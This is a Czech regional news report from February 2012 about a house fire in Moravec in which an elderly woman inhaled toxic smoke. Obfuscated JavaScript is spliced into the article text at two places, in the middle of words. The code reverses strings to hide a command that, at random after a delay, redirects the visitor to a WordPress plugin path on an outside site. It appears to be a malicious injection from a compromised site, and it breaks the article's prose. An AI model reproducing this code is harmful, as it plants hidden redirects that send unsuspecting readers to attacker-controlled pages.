Moravec, moravec, aktuality, hasiči, zplodiny, hoření
Rainbow page separator

Hasiči: Starší žena se při požáru nadýchala jedovatých zplodin hoření

Pátek, 3. února 2012

hasici-vysocina-pozar-moravec-2Moravec/Čtyři jednotky hasičů likvidovaly ve čtvrtek odpoledne požár v rodinném domě v obci Moravec na Žďársku. Při požáru se starší majitelka domu nadýchala jedovatých zplodin hoření.

Hlášení o požáru přijalo Krajské operační a informační středisko Hasičského  záchranného sboru Kraje Vysočina v 15:56 hod. K požáru vyjela jednotka profesionálních hasičů ze stanice Velké Meziříčí, kterou posílily jednotky sborů dobrovolných hasičů z Moravce, Bobrové a Strážku.

Průzkumem místa zásahu hasiči zjistili, že je požárem zasažen jeden z pokojů v menším rodinném domku. Při požáru se nadýchala jedovatých zplodin hoření starší majitelka domu. Hasiči jí poskytli předlékařskou první pomoc a po příjezdu zdravotníků ji předali do jejich péče. K dalšímu ošetření byla žena převezena sanitním vozem do nemocnice.

hasici-vysocina-pozar-moravec-1Jednotkám se podařilo požár velmi rychle lokalizovat. Zakouřené pros["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory hasiči odvětrali za pomoci přirozené a přetlakové ventilace. Požárem zasažené věci jednotky vynosily před dům.

V 17:21 hod byl požár zcela zlikvidován a jednotky se začaly postupně vracet zpět na základny. Dohled nad požářištěm převzala místní jednotka sboru dobrovolných hasičů.

Příčina vzniku požáru a výše škody zůstávají nadále v šetření.

Připravila, fo["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to: kpt. Ing. Petra Musilová, DiS., tisková mluvčí HZS Kraje Vysočina